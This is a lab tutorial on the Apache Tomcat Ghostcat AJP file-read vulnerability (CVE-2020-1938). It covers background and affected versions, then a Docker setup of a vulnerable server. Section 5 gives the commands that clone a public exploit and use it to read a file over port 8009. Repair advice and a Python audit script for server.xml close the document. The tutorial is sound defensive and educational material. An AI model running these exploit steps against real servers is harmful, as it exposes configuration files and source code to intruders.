Sunday, September 8, 2024

Apache Tomcat file contains vulnerability recurrence (detailed tutorial) (1)

1. Principle of vulnerability

Tomcat is a free, open source web application server. After installation the AJP connector is enabled by default so that other web servers can interact with Tomcat over the AJP protocol. It is a lightweight application server, commonly used for small and medium-sized systems and for sites without many concurrent users, and it is the first choice for developing and debugging JSP programs. Like web servers such as IIS, Tomcat can serve HTML pages; in addition it is a Servlet and JSP container, and running as an independent Servlet container is Tomcat's default mode. Tomcat's handling of static HTML, however, is not as good as the Apache HTTP Server's. Tomcat is a project developed by the Apache open source organization to handle HTTP services; both Tomcat and the Apache HTTP Server are free and can run as independent web servers. Because Apache Tomcat opens the AJP connector to let other web servers interact with it over AJP, a flaw in Tomcat's AJP protocol handling gives rise to this vulnerability: an attacker who can reach the AJP port can read any file under the webapp directory by constructing specific parameters.

2. Vulnerability overview and analysis

Tomcat is a project developed by the Apache open source organization to handle HTTP services; both Tomcat and the Apache HTTP Server are free and can run as independent web servers. The Apache Tomcat server has a file inclusion vulnerability: an attacker can use it to read or include any file in any webapp directory on the Tomcat instance, such as a webapp's configuration files or source code.

AJP Connector

The Apache Tomcat server establishes a connection with the client program through the Connector component, which represents the endpoint that receives a request and returns a response. In other words, the Connector is responsible for receiving the client's request and sending the Tomcat server's response back to the client. In Apache Tomcat, port 8080, the one we use most, belongs to the so-called HTTP Connector, which speaks HTTP/1.1.

In the conf/server.xml file, its corresponding configuration is

<Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />

The AJP Connector uses the AJP protocol (Apache JServ Protocol), a packet-oriented protocol. For performance reasons it transmits readable text in a binary format, which reduces the processing cost of HTTP requests, so it is mainly used in scenarios that require clustering or a reverse proxy.

The configuration corresponding to the Ajp protocol is

<Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />

The Tomcat server exposes this port to the external network by default. There are two ways for web clients to reach the Tomcat server:

Apache server

(1) AJP is a binary TCP transport protocol, and a browser cannot speak AJP directly. Instead, Apache communicates with Tomcat over AJP and then reverse-proxies the traffic through its proxy_ajp module, converting the result into HTTP that is exposed to the user, so that the user can access it.

(2) The reason for this design is that, compared with the plain-text HTTP protocol, AJP has higher efficiency and performance and has received many optimizations. To a certain extent AJP can be understood as a binary version of HTTP, used to speed up transmission. In practice, however, very few servers besides Apache have a proxy_ajp module that can reverse proxy AJP, so the AJP protocol is rarely used in production environments.

3. Scope of influence

Apache Tomcat 6

Tomcat 7 series < 7.0.100

Tomcat 8 series < 8.5.51

Tomcat 9 series < 9.0.31

4. Build a weak environment

4.1 Ubuntu

4.2 Update the package sources

4.3 Install docker

sudo apt-get update

sudo apt-get install docker

sudo apt-get install docker.io

sudo apt-get install docker-registry

sudo docker version

4.4 Install nmap

apt-get install nmap

4.5 Install Tomcat

docker search Tomcat-8.5.32

docker pull duonghuuphuc/tomcat-8.5.32

4.6 View the pulled Tomcat image

docker images

4.7 Boot Image

docker run -d -p 8080:8080 -p 8009:8009 --name ghostcat duonghuuphuc/tomcat-8.5.32

docker port ghostcat

4.8 Check the IP address (here it is 192.168.86.129)

ifconfig -a

4.9 If the browser can open the Tomcat page, the environment has been set up successfully

192.168.86.129:8080

5. Vulnerability Recurrence

5.1 Enter the container and change to the ROOT webapp directory

docker exec -it ghostcat /bin/bash

cd webapps/ROOT/

5.2 Add test files

echo 'this is CVE-2020-1938' > test.txt

ls

cat test.txt

5.3 Obtain the exploit

exp address: https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

5.4 Make the script executable

cd CNVD-2020-10487-Tomcat-Ajp-lfi/
ls
chmod +x CNVD-2020-10487-Tomcat-Ajp-lfi.py
ls

5.5 Use exp to read the file

./CNVD-2020-10487-Tomcat-Ajp-lfi.py -p 8009 -f test.txt 192.168.86.129

The test file is read successfully.

6. Vulnerability repair and defense methods

This Apache Tomcat file inclusion vulnerability is fixed in newer versions: Apache has officially released versions 9.0.31, 8.5.51 and 7.0.100 to address it. Users who are temporarily unable to upgrade can apply the following measures according to their own circumstances. If you do not need the Tomcat AJP protocol, close the AJP Connector directly, or change its listening address so that it only listens on the machine's localhost; if you do need the AJP protocol, configure authentication credentials through the protocol attributes for your version, as follows:

  1. Immediately upgrade Tomcat to version 9.0.31, 8.5.51 or 7.0.100 for repair.

  2. Disable or restrict the AJP protocol.

Edit conf/server.xml and find the AJP Connector line shown in section 2 (the Connector with port="8009" and protocol="AJP/1.3").

Comment out this line (or delete it) if AJP is not needed.

Otherwise, configure the secret to set the authentication credentials for the AJP protocol, replacing YOUR_TOMCAT_AJP_SECRET with a value that is highly secure and cannot be easily guessed.

  1. Configure access control: Properly configuring access control is one of the important measures to prevent vulnerabilities. By configuring appropriate access control policies, you can restrict access to sensitive files and allow only authorized users to perform relevant operations.

  2. Regular monitoring and updates: Regularly monitor vulnerability information and security bulletins, and update relevant software and patches in a timely manner to ensure the security and stability of the system.

  3. Strengthen server security: In addition to taking measures against specific vulnerabilities, the security of the entire server should also be strengthened. For example, use a firewall to restrict access to the server, enable Web Application Firewall (WAF), configure SSL/TLS encrypted transmission, use strong passwords and change passwords regularly, disable unnecessary services, etc.
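As an added example (not part of the original post and not code from the exploit repository linked above), the following Python script audits the AJP connector settings described in section 6: it parses a server.xml fragment and flags an AJP connector that is not bound to loopback or has no shared secret. Both server.xml fragments are constructed here; the address, secretRequired and secret attributes are the Tomcat AJP connector attributes used by the fixed 8.5.x/9.0.x releases (Tomcat 7.0.100 names the secret attribute requiredSecret).

```python
import xml.etree.ElementTree as ET

# Constructed server.xml fragments (not taken from the tutorial's Docker image).
# Weak: the AJP connector exactly as shown in section 2, with no address and no secret.
WEAK_SERVER_XML = """<Server>
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
  </Service>
</Server>"""

# Hardened: AJP kept for a local reverse proxy, bound to loopback and protected by a secret.
# Replace YOUR_TOMCAT_AJP_SECRET with a long random value before use.
HARDENED_SERVER_XML = """<Server>
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="YOUR_TOMCAT_AJP_SECRET" redirectPort="8443" />
  </Service>
</Server>"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml: str) -> list:
    """Return one finding per risky AJP connector setting in a server.xml document.

    An absent address attribute is treated as 0.0.0.0, which is how versions in the
    affected range (for example the 8.5.32 image used above) bind the AJP port.
    """
    findings = []
    root = ET.fromstring(server_xml)
    for conn in root.iter("Connector"):
        if not conn.get("protocol", "HTTP/1.1").upper().startswith("AJP"):
            continue  # only AJP connectors are affected by CVE-2020-1938
        port = conn.get("port", "?")
        address = conn.get("address", "0.0.0.0")
        if address not in LOOPBACK:
            findings.append(f"AJP connector on port {port} listens on {address}, not loopback")
        if conn.get("secretRequired", "true").lower() != "true":
            findings.append(f"AJP connector on port {port} sets secretRequired=false")
        if not (conn.get("secret") or conn.get("requiredSecret")):
            findings.append(f"AJP connector on port {port} has no shared secret configured")
    return findings


if __name__ == "__main__":
    for name, xml in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(name, audit_ajp_connectors(xml) or ["no findings"])
```

Running it against a real conf/server.xml (read the file and pass its text to audit_ajp_connectors) gives an empty list only when every AJP connector is loopback-bound and has a secret.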
